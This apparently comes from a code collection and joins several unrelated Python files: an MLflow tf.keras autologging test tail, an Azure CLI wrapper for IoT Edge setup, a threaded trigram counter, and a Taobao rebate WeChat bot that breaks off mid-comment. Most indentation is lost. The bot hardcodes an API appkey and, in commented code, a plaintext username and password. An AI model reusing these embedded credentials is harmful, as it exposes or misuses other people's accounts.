model.fit_generator(generator(), epochs=10, steps_per_epoch=1)
run = mlflow.tracking.MlflowClient().get_run(run.info.run_id)
params = run.data.params
metrics = run.data.metrics
assert "epochs" in params
assert params["epochs"] == "10"
assert "steps_per_epoch" in params
assert params["steps_per_epoch"] == "1"
assert "accuracy" in metrics
assert "loss" in metrics
@pytest.mark.large
@pytest.mark.usefixtures("clear_tf_keras_imports")
def test_fluent_autolog_with_tf_keras_logs_expected_content(
random_train_data, random_one_hot_labels
):
"""
Guards against previously-exhibited issues where using the fluent `mlflow.autolog()` API with
`tf.keras` Models did not work due to conflicting patches set by both the
`mlflow.tensorflow.autolog()` and the `mlflow.keras.autolog()` APIs.
"""
mlflow.autolog()
model = create_tf_keras_model()
with mlflow.start_run() as run:
model.fit(random_train_data, random_one_hot_labels, epochs=10)
client = mlflow.tracking.MlflowClient()
run_data = client.get_run(run.info.run_id).data
assert "accuracy" in run_data.metrics
assert "epochs" in run_data.params
artifacts = client.list_artifacts(run.info.run_id)
artifacts = map(lambda x: x.path, artifacts)
assert "model" in artifacts
@pytest.mark.large
@pytest.mark.skipif(
Version(tf.__version__) < Version("2.6.0"),
reason=("TensorFlow only has a hard dependency on Keras in version >= 2.6.0"),
)
@pytest.mark.usefixtures("clear_tf_keras_imports")
def test_fluent_autolog_with_tf_keras_preserves_v2_model_reference():
"""
Verifies that, in TensorFlow >= 2.6.0, `tensorflow.keras.Model` refers to the correct class in
the correct module after `mlflow.autolog()` is called, guarding against previously identified
compatibility issues between recent versions of TensorFlow and MLflow's internal utility for
setting up autologging import hooks.
"""
mlflow.autolog()
import tensorflow.keras
from keras.api._v2.keras import Model as ModelV2
assert tensorflow.keras.Model is ModelV2
@pytest.mark.usefixtures("clear_tf_keras_imports")
def test_import_tensorflow_with_fluent_autolog_enables_tf_autologging():
mlflow.autolog()
import tensorflow # pylint: disable=unused-variable,unused-import,reimported
assert not autologging_is_disabled(mlflow.tensorflow.FLAVOR_NAME)
# NB: In Tensorflow >= 2.6, we redirect keras autologging to tensorflow autologging
# so the original keras autologging is disabled
if Version(tf.__version__) >= Version("2.6"):
import keras # pylint: disable=unused-variable,unused-import
assert autologging_is_disabled(mlflow.keras.FLAVOR_NAME)
@pytest.mark.large
@pytest.mark.usefixtures("clear_tf_keras_imports")
def test_import_tf_keras_with_fluent_autolog_enables_tf_autologging():
mlflow.autolog()
import tensorflow.keras # pylint: disable=unused-variable,unused-import
assert not autologging_is_disabled(mlflow.tensorflow.FLAVOR_NAME)
# NB: In Tensorflow >= 2.6, we redirect keras autologging to tensorflow autologging
# so the original keras autologging is disabled
if Version(tf.__version__) >= Version("2.6"):
# NB: For TF >= 2.6, import tensorflow.keras will trigger importing keras
assert autologging_is_disabled(mlflow.keras.FLAVOR_NAME)
@pytest.mark.large
@pytest.mark.skipif(
Version(tf.__version__) < Version("2.6.0"),
reason=("TensorFlow autologging is not used for vanilla Keras models in Keras < 2.6.0"),
)
@pytest.mark.usefixtures("clear_tf_keras_imports")
def test_import_keras_with_fluent_autolog_enables_tensorflow_autologging():
mlflow.autolog()
import keras # pylint: disable=unused-variable,unused-import
assert not autologging_is_disabled(mlflow.tensorflow.FLAVOR_NAME)
assert autologging_is_disabled(mlflow.keras.FLAVOR_NAME)
|
azurecli.py
|
import json
import os
import signal
import subprocess
import sys
from io import StringIO
from threading import Thread, Timer
from azure.cli.core import get_default_cli
from fstrings import f
from six.moves.queue import Empty, Queue
from . import telemetry
from .compat import PY2
if PY2:
from .compat import FileNotFoundError
output_io_cls = StringIO
def get_query_argument_for_id_and_name(token):
return "[?starts_with(@.id,'{0}') || contains(@.name,'{1}')]".format(token.lower(), token)
class AzureCli:
def __init__(self, output, envvars, cli=get_default_cli()):
self.output = output
self.envvars = envvars
self.az_cli = cli
self.process = None
self._proc_terminated = False
def decode(self, val):
return val.decode("utf-8").strip()
def is_posix(self):
return self.envvars.is_posix()
def prepare_az_cli_args(self, args, suppress_output=False):
if suppress_output:
args.extend(["--query", "\"[?n]|[0]\""])
az_args = ["az"]+args
return az_args
def invoke_az_cli_outproc(self, args, error_message=None, stdout_io=None, stderr_io=None, suppress_output=False, timeout=None):
try:
if timeout:
timeout = int(timeout)
monitor_events = False
if 'monitor-events' in args:
monitor_events = True
self._proc_terminated = False
# Consider using functools
if monitor_events:
process = subprocess.Popen(self.prepare_az_cli_args(args, suppress_output),
shell=not self.is_posix(),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
preexec_fn=os.setsid if self.is_posix() else None,
creationflags=subprocess.CREATE_NEW_PROCESS_GROUP if not self.is_posix() else 0)
elif stdout_io or stderr_io:
process = subprocess.Popen(self.prepare_az_cli_args(args, suppress_output),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=not self.is_posix())
else:
process = subprocess.Popen(self.prepare_az_cli_args(args, suppress_output),
shell=not self.is_posix())
self.process = process
timer = None
if timeout:
# This Timer attempts to be accurate, but that's not always the case in practice
timer = Timer(float(timeout),
self._terminate_process_tree,
args=['Timeout set to {0} seconds, which expired as expected.'.format(timeout)])
try:
if timer:
timer.start()
if not monitor_events:
stdout_data, stderr_data = process.communicate()
else:
return self._handle_monitor_event_process(process)
finally:
if timer:
timer.cancel()
if stderr_data and b"invalid_grant" in stderr_data:
self.output.error(self.decode(stderr_data))
self.output.info(
"Your Azure CLI session has expired. Please re-run `iotedgedev iothub setup` to refresh your credentials.")
self.logout()
sys.exit()
if stdout_io and stdout_data != "":
stdout_io.writelines(self.decode(stdout_data))
if stderr_io and stderr_data != "":
stderr_io.writelines(self.decode(stderr_data))
if process.returncode != 0:
if error_message:
self.output.error(error_message)
self.output.line()
return False
if not stdout_io and not stderr_io:
self.output.line()
except Exception as e:
if error_message:
self.output.error(error_message)
self.output.error(str(e))
self.output.line()
return False
return True
def _enqueue_stream(self, stream, queue):
try:
while not self._proc_terminated:
queue.put(stream.readline().decode('utf8').rstrip())
finally:
stream.close()
def _handle_monitor_event_process(self, process, error_message=None):
stdout_queue = Queue()
stderr_queue = Queue()
stream_thread_map = {
'stdout': Thread(target=self._enqueue_stream, args=(process.stdout, stdout_queue), daemon=True),
'stderr': Thread(target=self._enqueue_stream, args=(process.stderr, stderr_queue), daemon=True)
}
stream_thread_map['stdout'].start()
stream_thread_map['stderr'].start()
try:
while not self._proc_terminated:
if not process.poll():  # poll() returns None while the process is still running
try:
self.output.echo(stdout_queue.get_nowait())
except Empty:
pass
else:
err = None
try:
err = stderr_queue.get_nowait()
except Empty:
pass
# Avoid empty sys.excepthook errors from underlying future
# There is already a uAMQP issue in work for this
# https://github.com/Azure/azure-uamqp-python/issues/30
if err and "sys.excepthook" not in err:
err = err.lstrip()
err = err[len('ERROR:'):].lstrip() if err.startswith('ERROR:') else err  # lstrip('ERROR:') would strip a character set, not the prefix
if error_message:
err = "{}: {}".format(error_message, err)
self.output.error(err)
return False
except KeyboardInterrupt:
self.output.info('Terminating process...')
self._terminate_process_tree()
return True
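# Kill the whole az process group: os.killpg on POSIX (the child was started with setsid),
# CTRL_BREAK_EVENT plus kill() on Windows (started with CREATE_NEW_PROCESS_GROUP).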
def _terminate_process_tree(self, msg=None):
try:
if self.process:
if self.is_posix():
os.killpg(os.getpgid(self.process.pid), signal.SIGTERM)
else:
self.process.send_signal(signal.CTRL_BREAK_EVENT)
self.process.kill()
self._proc_terminated = True
if msg:
self.output.info(msg)
self.output.line()
return True
except Exception:
return False
def invoke_az_cli(self, args, error_message=None, stdout_io=None):
try:
exit_code = self.az_cli.invoke(args, out_file=stdout_io)
if exit_code and exit_code != 0:
if error_message:
self.output.error(error_message)
return False
except Exception as e:
if error_message:
self.output.error(error_message)
self.output.error(str(e))
return False
self.output.line()
return True
def add_extension(self, name):
return self.invoke_az_cli_outproc(["extension", "add", "--name", name,
"--yes"],
f("Error while adding extension {name}."), suppress_output=True)
def add_extension_with_source(self, source_url):
return self.invoke_az_cli_outproc(["extension", "add", "--source", source_url,
"--yes"],
f("Error while add extension from source {source_url}."),
suppress_output=True)
def extension_exists(self, name):
return self.invoke_az_cli_outproc(["extension", "show", "--name", name, "--output", "table"],
f("Error while checking for extension {name}."), suppress_output=True)
def user_has_logged_in(self):
self.output.header("AUTHENTICATION")
self.output.status(f("Retrieving Azure CLI credentials from cache..."))
with output_io_cls() as io:
result = self.invoke_az_cli_outproc(
["account", "show"], stdout_io=io)
if result:
try:
self.output.prompt("Azure CLI credentials found.")
out_string = io.getvalue()
data = json.loads(out_string)
return data["id"]
except Exception:
pass
self.output.prompt(
"Azure CLI credentials not found. Please follow instructions below to login to the Azure CLI.")
return None
def login_account(self, username, password):
return self.invoke_az_cli_outproc(["login", "-u", username,
"-p", password],
"Error while trying to login to Azure. Make sure your account credentials are correct", suppress_output=True)
def login_sp(self, username, password, tenant):
return self.invoke_az_cli_outproc(["login", "--service-principal", "-u", username,
"-p", password, "--tenant", tenant],
"Error while trying to login to Azure. Make sure your service principal credentials are correct.", suppress_output=True)
def login_interactive(self):
return self.invoke_az_cli_outproc(["login"],
"Error while trying to login to Azure.", suppress_output=True)
def logout(self):
return self.invoke_az_cli_outproc(["account", "clear"])
def list_subscriptions(self):
self.output.status("Retrieving Azure Subscriptions...")
return self.invoke_az_cli_outproc(["account", "list", "--all", "--query", "[].{\"Subscription Name\":name, Id:id}", "--out", "table"],
"Error while trying to list Azure subscriptions.")
def get_default_subscription(self):
with output_io_cls() as io:
result = self.invoke_az_cli_outproc(["account", "show"],
"Error while trying to get the default Azure subscription id.", io)
if result:
out_string = io.getvalue()
data = json.loads(out_string)
return data["id"]
return ''
def get_subscription_id_starts_with(self, token):
with output_io_cls() as io:
query = get_query_argument_for_id_and_name(token)
result = self.invoke_az_cli_outproc(["account", "list", "--query", query],
"Could not find a subscription for which the id starts with or name contains '{0}'".format(token), io)
if result:
out_string = io.getvalue()
if out_string:
data = json.loads(out_string)
if len(data) == 1:
return data[0]["id"]
elif len(data) > 1:
self.output.error(
"Found multiple subscriptions for which the ids start with or names contain '{0}'. Please enter more characters to further refine your selection.".format(token))
return token
else:
self.output.error("Could not find a subscription for which the id starts with or name contains '{0}'.".format(token))
return ''
def set_subscription(self, subscription):
if len(subscription) < 36:
subscription = self.get_subscription_id_starts_with(subscription)
if len(subscription) < 36:
return subscription
if len(subscription) == 36:
self.output.status(f("Setting Subscription to '{subscription}'..."))
result = self.invoke_az_cli_outproc(["account", "set", "--subscription", subscription],
"Error while trying to set Azure subscription.")
if result:
return subscription
return None
def resource_group_exists(self, name):
self.output.status(f("Checking if Resource Group '{name}' exists..."))
with output_io_cls() as io:
result = self.invoke_az_cli_outproc(["group", "exists", "-n", name],
f("Resource Group {name} does not exist."), io)
if result:
out_string = io.getvalue()
if out_string == "true":
return True
self.output.prompt(f("Resource Group {name} does not exist."))
return False
def get_resource_group_location(self, name):
self.output.status(f("Retrieving Resource Group '{name}' location..."))
with output_io_cls() as io:
result = self.invoke_az_cli_outproc(["group", "show", "-n", name, "--query", "location", "--output", "tsv"],
f("Could not retrieve Resource Group {name}'s location."), io)
if result:
return io.getvalue()
else:
return ''
def create_resource_group(self, name, location):
self.output.status(
f("Creating Resource Group '{name}' at '{location}'..."))
with output_io_cls() as io:
result = self.invoke_az_cli_outproc(["group", "create", "--name", name, "--location", location],
f("Could not create the new Resource Group {name} at location:{location}."), io)
return result
def list_resource_groups(self):
self.output.header("RESOURCE GROUP")
self.output.status("Retrieving Resource Groups...")
with output_io_cls() as io:
result = self.invoke_az_cli_outproc(["group", "list", "--query", "[].{\"Resource Group\":name, Location:location}", "--out", "table"], "Could not list the Resource Groups.", stdout_io=io)
self.output.prompt(io.getvalue())
self.output.line()
return result
def set_modules(self, device_id, connection_string, config):
self.output.status(f("Deploying '{config}' to '{device_id}'..."))
config = os.path.join(os.getcwd(), config)
if not os.path.exists(config):
raise FileNotFoundError('Deployment manifest file "{0}" not found. Please run `iotedgedev build` first'.format(config))
telemetry.add_extra_props({'iothubhostname': connection_string.iothub_host.name_hash, 'iothubhostnamesuffix': connection_string.iothub_host.name_suffix})
return self.invoke_az_cli_outproc(["iot", "edge", "set-modules", "-d", device_id, "-n", connection_string.iothub_host.hub_name, "-k", config, "-l", connection_string.connection_string],
error_message=f("Failed to deploy '{config}' to '{device_id}'..."), suppress_output=True)
def monitor_events(self, device_id, connection_string, hub_name, timeout=300):
return self.invoke_az_cli_outproc(["iot", "hub", "monitor-events", "-d", device_id, "-n", hub_name, "-l", connection_string, '-t', str(timeout), '-y'],
error_message=f("Failed to start monitoring events."), suppress_output=False, timeout=timeout)
def get_free_iothub(self):
with output_io_cls() as io:
result = self.invoke_az_cli_outproc(["iot", "hub", "list"], f("Could not list IoT Hubs in subscription."), stdout_io=io)
if result:
out_string = io.getvalue()
data = json.loads(out_string)
for iot in data:
if iot["sku"]["name"] == "F1":
return (iot["name"], iot["resourceGroup"])
return (None, None)
def get_first_iothub(self, resource_group):
with output_io_cls() as io:
result = self.invoke_az_cli_outproc(
["iot", "hub", "list", "--resource-group", resource_group, "--query", "[0]"], f("Could not get first IoT Hub."), io)
if result:
out_string = io.getvalue()
if out_string:
data = json.loads(out_string)
return data["name"]
return ''
def list_iot_hubs(self, resource_group):
self.output.header("IOT HUB")
self.output.status(f("Retrieving IoT Hubs in '{resource_group}'..."))
return self.invoke_az_cli_outproc(["iot", "hub", "list", "--resource-group", resource_group, "--query", "[].{\"IoT Hub\":name}", "--out", "table"],
f("Could not list the IoT Hubs in {resource_group}."))
def iothub_exists(self, value, resource_group):
self.output.status(
f("Checking if '{value}' IoT Hub exists..."))
with output_io_cls() as io:
result = self.invoke_az_cli_outproc(["iot", "hub", "show", "--name", value, "--resource-group",
resource_group, "--out", "table"], stderr_io=io)
if not result:
self.output.prompt(
f("Could not locate the {value} in {resource_group}."))
return result
def create_iothub(self, value, resource_group, sku):
self.output.status(
f("Creating '{value}' in '{resource_group}' with '{sku}' sku..."))
with output_io_cls() as io:
with output_io_cls() as error_io:
self.output.prompt(
"Creating IoT Hub. Please wait as this could take a few minutes to complete...")
result = self.invoke_az_cli_outproc(["iot", "hub", "create", "--name", value, "--resource-group",
resource_group, "--sku", sku, "--query", "[].{\"IoT Hub\":name}", "--out", "table"],
f("Could not create the IoT Hub {value} in {resource_group} with sku {sku}."), stdout_io=io, stderr_io=error_io)
if not result and error_io.getvalue():
self.output.error(error_io.getvalue())
self.output.line()
elif io.getvalue():
self.output.prompt(io.getvalue())
self.output.line()
return result
def get_iothub_connection_string(self, value, resource_group):
self.output.status(
f("Retrieving '{value}' connection string..."))
with output_io_cls() as io:
result = self.invoke_az_cli_outproc(["iot", "hub", "show-connection-string", "--hub-name", value,
"--resource-group", resource_group],
f("Could not create the IoT Hub {value} in {resource_group}."), stdout_io=io)
if result:
out_string = io.getvalue()
data = json.loads(out_string)
if "cs" in data:
return data["cs"]
else:
return data["connectionString"]
return ''
def edge_device_exists(self, value, iothub, resource_group):
self.output.status(
f("Checking if '{value}' device exists in '{iothub}'..."))
with output_io_cls() as io:
result = self.invoke_az_cli_outproc(["iot", "hub", "device-identity", "show", "--device-id", value, "--hub-name", iothub,
"--resource-group", resource_group, "--out", "table"], stderr_io=io)
if not result:
self.output.prompt(
f("Could not locate the {value} device in {iothub} IoT Hub in {resource_group}."))
return result
def list_edge_devices(self, iothub):
self.output.header("EDGE DEVICE")
self.output.status(
f("Retrieving edge devices in '{iothub}'..."))
return self.invoke_az_cli_outproc(["iot", "hub", "device-identity", "list", "--hub-name", iothub,
"--edge-enabled", "--query", "[].{\"Device Id\":deviceId}", "--output", "table"],
f("Could not list the edge devices in {iothub} IoT Hub."))
def create_edge_device(self, value, iothub, resource_group):
self.output.status(
f("Creating '{value}' edge device in '{iothub}'..."))
return self.invoke_az_cli_outproc(["iot", "hub", "device-identity", "create", "--device-id", value, "--hub-name", iothub,
"--resource-group", resource_group, "--edge-enabled", "--query", "[].{\"Device Id\":deviceId}", "--output", "table"],
f("Could not locate the {value} device in {iothub} IoT Hub in {resource_group}."))
def get_device_connection_string(self, value, iothub, resource_group):
self.output.status(
f("Retrieving '{value}' connection string..."))
with output_io_cls() as io:
result = self.invoke_az_cli_outproc(["iot", "hub", "device-identity", "show-connection-string", "--device-id", value, "--hub-name", iothub,
"--resource-group", resource_group],
f("Could not locate the {value} device in {iothub} IoT Hub in {resource_group}."), stdout_io=io)
if result:
out_string = io.getvalue()
data = json.loads(out_string)
if "cs" in data:
return data["cs"]
else:
return data["connectionString"]
return ''
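# Minimal usage sketch (hypothetical `output` and `envvars` objects supplied by the host application):
#   azure_cli = AzureCli(output, envvars)
#   if azure_cli.user_has_logged_in() is None:
#       azure_cli.login_interactive()
#   azure_cli.set_subscription("my-subscription-id-or-prefix")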
|
lab5.py
|
import threading
tr_dict = dict()
mutex = threading.Lock()
prohibited = (',','.','?','!','-','+','\'','@')
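# Count every 3-character window (trigram) in in_str; characters in `prohibited` reset the
# window. Each call builds a local count dict, then merges it into the shared tr_dict.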
def Count_trigrams(in_str):
    trgrms = dict()
    trgrm = ""
    for i in in_str:
        if i not in prohibited:
            trgrm += i
        else:
            trgrm = ""
        if len(trgrm) == 3:
            if trgrm in trgrms:
                trgrms[trgrm] += 1
            else:
                trgrms[trgrm] = 1
            trgrm = trgrm[1:]
    Add_to_global(trgrms)
def Add_to_global(trgrms):
    for i in trgrms:
        mutex.acquire()
        if i in tr_dict:
            tr_dict[i] += trgrms[i]
        else:
            tr_dict[i] = trgrms[i]
        mutex.release()
in_str = input("input your string here:\n")
strs = in_str.split()
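# One thread per whitespace-separated word; each worker counts its own trigrams and
# merges them into tr_dict under the lock.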
threads = [
threading.Thread(target = Count_trigrams, args = (s,))
for s in strs
]
for t in threads:
    t.start()
for t in threads:
    t.join()
print(tr_dict)
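# Note: because the input is split on whitespace and every word is processed independently,
# trigrams never span word boundaries, and punctuation resets the 3-character window.
# A sketch of the same merge if tr_dict were a collections.Counter (hypothetical refactor):
#   with mutex:
#       tr_dict.update(trgrms)  # Counter.update adds counts instead of replacing values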
|
old_alimama.py
|
# encoding: utf-8
import os
import re
import json
import os.path
import configparser
import platform
import random
import sys
import time
import traceback
import datetime
if sys.version_info[0] < 3:
import urllib
else:
import urllib.parse as urllib
from io import BytesIO
import pyqrcode
import requests
from PIL import Image
from threading import Thread
from libs.mysql import ConnectMysql
from libs.orther import Orther
from libs.movie import SharMovie
from selenium import webdriver
from selenium.webdriver.common.action_chains import ActionChains
cookie_fname = 'cookies_taobao.txt'
config = configparser.ConfigParser()
config.read('config.conf',encoding="utf-8-sig")
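# Alimama answers WeChat messages that contain a Taobao share token (taokouling) with a
# rebate quote: it resolves the token to an item, fetches the item's coupon, and re-encodes
# the coupon link as a new share token. The legacy cookie/QR-login helpers below are disabled.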
class Alimama:
def __init__(self, logger, bot):
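# Only create the shared requests session when Taobao lookups are enabled in config.conf.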
if config.get('SYS', 'tb') == 'yes':
self.se = requests.session()
self.se.keep_alive = False
# self.load_cookies()
# self.myip = "127.0.0.1"
# self.start_keep_cookie_thread()
self.logger = logger
self.ort = Orther()
self.movie = SharMovie()
self.bot2 = bot
# Encryption helper (commented out, kept for reference)
# def encrypt_oracle(self, value):
# a = ''
# for i in value:
# a = a + str(ord(i)) + '**'
#
# return a
def getTao(self, bot, msg, raw):
if config.get('SYS', 'tb') == 'no':
text = '''
一一一一系统信息一一一一
机器人在升级中, 暂不支持淘宝商品查询
'''
return text
try:
# q = re.search(r'【.*】', msg['Text']).group().replace(u'【', '').replace(u'】', '')
# if u'打开👉天猫APP👈' in msg['Text']:
# try:
# url = re.search(r'http://.* \)', msg['Text']).group().replace(u' )', '')
# except:
# url = None
#
# else:
# try:
# url = re.search(r'http://.* ,', msg['Text']).group().replace(u' ,', '')
# except:
# url = None
# if url is None:
# taokoulingurl = 'http://www.taokouling.com/index.php?m=api&a=taokoulingjm'
# if '《' in msg['Text']:
# taokouling = re.search(r'《.*?《', msg['Text']).group()
# elif '¥' in msg['Text']:
# taokouling = re.search(r'¥.*?¥', msg['Text']).group()
# elif '€' in msg['Text']:
# taokouling = re.search(r'€.*?€', msg['Text']).group()
# parms = {'username': 'wx_tb_fanli', 'password': 'wx_tb_fanli', 'text': taokouling}
# res = requests.post(taokoulingurl, data=parms)
# url = res.json()['url'].replace('https://', 'http://')
# real_url = self.get_real_url(url)
#
# res = self.get_detail(bot, real_url, raw)
# Extract the taokouling (Taobao share token) from the message text
taokouling = ''  # default; if no token marker is found the lookup below falls through to the except handler
if '《' in msg['Text']:
taokouling = re.search(r'《.*?《', msg['Text']).group()
elif '¥' in msg['Text']:
taokouling = re.search(r'¥.*?¥', msg['Text']).group()
elif '€' in msg['Text']:
taokouling = re.search(r'€.*?€', msg['Text']).group()
# res = requests.get('http://api.hitui.net/Kl_Query?appkey=JoB3RIns&content=' + taokouling)
res = self.se.get('http://tuijian.ptjob.net/phpsdk/sdkList/taobao_wireless_share_tpwd_query.php?str=' + taokouling)
resj = json.loads(res.text)
id = ''
urlToToken=''
if 'https://item.taobao.com' in resj['url']:
potten2 = resj['url'].split('&id=')
id = potten2[1].split('&sourceType')[0]
else:
potten = resj['url'].split('https://a.m.taobao.com/i')
id = potten[1].split('.htm')[0]
url3 = 'http://api.hitui.net/privilege?type=1&appkey=JoB3RIns&id=%s&pid=%s&session=%s' % (id, config.get('SYS', 'PID'), config.get('SYS', 'SESSION'))
print(url3)
# Fetch the coupon link for this item
datares = self.se.get(url3)
coupon_link = json.loads(datares.text)
if 'tbk_privilege_get_response' not in coupon_link or 'coupon_info' not in json.dumps(coupon_link):
# No coupon available: fall back to a recommendation link
tui_url = 'http://tuijian.ptjob.net/www/public/index.html%23/index/' + id
shortUrl = self.movie.getShortUrl(tui_url)
text = '''
一一一一 返利信息 一一一一
亲,当前商品优惠券已领完,为您精选如下优惠券商品
精选好券:'''+shortUrl+'''
'''
return text
coupon_link = json.loads(datares.text)['tbk_privilege_get_response']['result']['data']
# Parse the coupon amount (yuan): the number between '减' and '元' in coupon_info
coupon_price = coupon_link['coupon_info'].split('减')[1].split('元')[0]
ress=self.se.get('http://tuijian.ptjob.net/phpsdk/sdkList/taobao_tbk_tpwd_create.php?title='+resj['content']+'&counp_link='+coupon_link['coupon_click_url']+'&image_link='+resj['pic_url'], headers={'Connection':'close'})
# Convert the coupon link into a new Taobao share token
urlToToken = json.loads(ress.text)['data']['model']
# Red-packet rebate: (price after coupon) * commission rate / 100, scaled by the BN.bn3t share
fx = round((round((float(resj['price']) - int(coupon_price)) * float(coupon_link['max_commission_rate']), 2) / 100) * float(config.get('BN', 'bn3t')), 2)
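# Worked example with hypothetical numbers: price 100.00, coupon 20, max_commission_rate 5.0,
# bn3t 0.6 -> round((round((100.00 - 20) * 5.0, 2) / 100) * 0.6, 2) == 2.4 yuan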
# Swap the first and last characters of the token for a random emoji marker
tu = {0: '🗝', 1: '📲', 2: '🎵'}
n = random.randint(0, 2)
tao_token = urlToToken.replace(urlToToken[:1], tu[n])
tao_token = tao_token.replace(tao_token[-1:], tu[n])
res_text = '''
一一一一返利信息一一一一
【商品名】%s
【淘宝价】%s元
【优惠券】%s元
【返红包】%.2f元
【淘链接】%s
获取返红包步骤:
1,复制本条消息打开淘宝领券
2,下完单后复制订单号发给我
''' % (resj['content'], resj['price'], coupon_price, fx, tao_token)
return res_text
# if res == 'no match item':
# text = '''
# 一一一一 返利信息 一一一一
#
# 亲,当前商品暂无优惠券,建议您换一个商品试试呢
#
# 京东优惠券商城:
# '''+config.get('URL', 'jdshop')+'''
# 淘宝优惠券商城:
# '''+config.get('URL', 'tbshop')+'''
# 邀请好友得返利说明:
# '''+config.get('URL', 'lnvit')+'''
# '''
# return text
#
# auctionid = res['auctionId']
# coupon_amount = res['couponAmount']
# price = res['zkPrice']
#
# # 佣金
# yongjin = price - coupon_amount
# if config.get('SYS', 'isHighServant') == 'yes':
# fx2 = round((yongjin * float(res['tkRate']) / 100) * float(config.get('BN', 'bn3t')), 2)
# else:
# fx2 = round((yongjin * float(res['tkCommonRate']) / 100) * float(config.get('BN', 'bn3t')), 2)
# real_price = round(price - coupon_amount, 2)
# res1 = self.get_tk_link(auctionid)
# tu = {0: '🗝', 1: '📲', 2: '🎵'}
# n = random.randint(0, 2)
# tao_token = res1['taoToken'].replace(res1['taoToken'][:1], tu[n])
# tao_token = tao_token.replace(tao_token[-1:], tu[n])
# # asciistr2 = self.encrypt_oracle(tao_token)
# # longurl2 = 'http://txq.ptjob.net/goodCouponToken?value=' + asciistr2 + 'image=' + res['pictUrl'] + 'title=' + res['title'] + 'coupon_url=' + res1['clickUrl']
# # shorturl2 = self.movie.getShortUrl(longurl2)
#
# coupon_link = res1['couponLink']
# if coupon_link != "":
# coupon_token = res1['couponLinkTaoToken'].replace(res1['couponLinkTaoToken'][:1], tu[n])
# coupon_token = coupon_token.replace(coupon_token[-1:], tu[n])
# # asciistr = self.encrypt_oracle(coupon_token)
# # longurl = 'http://txq.ptjob.net/goodCouponToken?value='+asciistr + 'image=' + res['pictUrl'] + 'title=' + res['title'] + 'coupon_url=' + res1['couponLink']
# # shorturl = self.movie.getShortUrl(longurl)
# res_text = '''
# 一一一一返利信息一一一一
#
# 【商品名】%s元
#
# 【淘宝价】%s元
# 【优惠券】%s元
# 【券后价】%s元
# 【返红包】%.2f元
# 【淘链接】%s
#
# 获取返红包步骤:
# 1,复制本条消息打开淘宝领券
# 2,下完单后复制订单号发给我
# ''' % (q, price, coupon_amount, real_price, fx2, coupon_token)
# else:
# res_text = '''
# 一一一一返利信息一一一一
#
# 【商品名】%s
# 【淘宝价】%s元
# 【返红包】%.2f元
# 【淘链接】%s
#
# 获取返红包步骤:
# 1,复制本条消息打开淘宝领券
# 2,下完单后复制订单号发给我
# ''' % (q, price, fx2, tao_token)
# return res_text
except Exception as e:
trace = traceback.format_exc()
print("error:{},trace:{}".format(str(e), trace))
info = '''
一一一一 返利信息 一一一一
亲,当前商品暂无优惠券,建议您换一个商品试试呢,您也可以在下边的优惠券商城中查找哦
京东优惠券商城:
'''+config.get('URL', 'jdshop')+'''
淘宝优惠券商城:
'''+config.get('URL', 'tbshop')+'''
邀请好友得返利说明:
'''+config.get('URL', 'lnvit')+'''
'''
return info
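# getGroupTao mirrors getTao for group-chat messages; the differences are a Connection: close
# header on the first request, a plain fallback link (no URL shortener) and an extra
# "add the bot as a friend" step in the reply template.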
def getGroupTao(self, raw, bot, msg):
if config.get('SYS', 'tb') == 'no':
text = '''
一一一一系统信息一一一一
机器人在升级中, 暂不支持淘宝商品查询
'''
return text
try:
# q = re.search(r'【.*】', msg['Text']).group().replace(u'【', '').replace(u'】', '')
# if u'打开👉天猫APP👈' in msg['Text']:
# try:
# url = re.search(r'http://.* \)', msg['Text']).group().replace(u' )', '')
# except:
# url = None
#
# else:
# try:
# url = re.search(r'http://.* ,', msg['Text']).group().replace(u' ,', '')
# except:
# url = None
#
# if url is None:
# taokoulingurl = 'http://www.taokouling.com/index.php?m=api&a=taokoulingjm'
# if '《' in msg['Text']:
# taokouling = re.search(r'《.*?《', msg['Text']).group()
# elif '¥' in msg['Text']:
# taokouling = re.search(r'¥.*?¥', msg['Text']).group()
# elif '€' in msg['Text']:
# taokouling = re.search(r'€.*?€', msg['Text']).group()
# parms = {'username': 'wx_tb_fanli', 'password': 'wx_tb_fanli', 'text': taokouling}
# res = requests.post(taokoulingurl, data=parms)
# url = res.json()['url'].replace('https://', 'http://')
#
# real_url = self.get_real_url(url)
#
# res = self.get_group_detail(bot, real_url, raw)
# if res == 'no match item':
# text = '''
# 一一一一 返利信息 一一一一
#
# 亲,当前商品暂无优惠券,建议您换一个商品试试呢
#
#
# 京东优惠券商城:
# '''+config.get('URL', 'jdshop')+'''
# 淘宝优惠券商城:
# '''+config.get('URL', 'tbshop')+'''
# 邀请好友得返利说明:
# '''+config.get('URL', 'lnvit')+'''fdasfsf
# '''
# return text
#
# auctionid = res['auctionId']
# coupon_amount = res['couponAmount']
# price = res['zkPrice']
# # 佣金
# yongjin = price - coupon_amount
# if config.get('SYS', 'isHighServant') == 'yes':
# fx2 = round((yongjin * float(res['tkRate']) / 100) * float(config.get('BN', 'bn3t')), 2)
# else:
# fx2 = round((yongjin * float(res['tkCommonRate']) / 100) * float(config.get('BN', 'bn3t')), 2)
# real_price = round(price - coupon_amount, 2)
# res1 = self.get_tk_link(auctionid)
#
# # tao_token = res1['taoToken']
# # asciistr2 = self.encrypt_oracle(tao_token)
# #
# # longurl2 = 'http://txq.ptjob.net/goodCouponToken?value=' + asciistr2 + 'image=' + res[
# # 'pictUrl'] + 'title=' + res['title'] + 'coupon_url=' + res1['clickUrl']
# # shorturl2 = self.movie.getShortUrl(longurl2)
#
# tu = {0: '🗝', 1: '📲', 2: '🎵'}
# n = random.randint(0, 2)
# tao_token = res1['taoToken'].replace(res1['taoToken'][:1], tu[n])
# tao_token = tao_token.replace(tao_token[-1:], tu[n])
#
# coupon_link = res1['couponLink']
# if coupon_link != "":
# # coupon_token = res1['couponLinkTaoToken']
# # asciistr = self.encrypt_oracle(coupon_token)
# # longurl = 'http://txq.ptjob.net/goodCouponToken?value=' + asciistr + 'image=' + res[
# # 'pictUrl'] + 'title=' + res['title'] + 'coupon_url=' + res1['couponLink']
# # shorturl = self.movie.getShortUrl(longurl)
# coupon_token = res1['couponLinkTaoToken'].replace(res1['couponLinkTaoToken'][:1], tu[n])
# coupon_token = coupon_token.replace(coupon_token[-1:], tu[n])
#
# res_text = '''
# 一一一一淘宝返利信息一一一一
#
# 【商品名】%s元
#
# 【淘宝价】%s元
# 【优惠券】%s元
# 【券后价】%s元
# 【返红包】%.2f元
# 【淘链接】%s
#
# 获取返红包步骤:
# 1,复制本条消息打开淘宝领券
# 2,点击头像添加机器人为好友
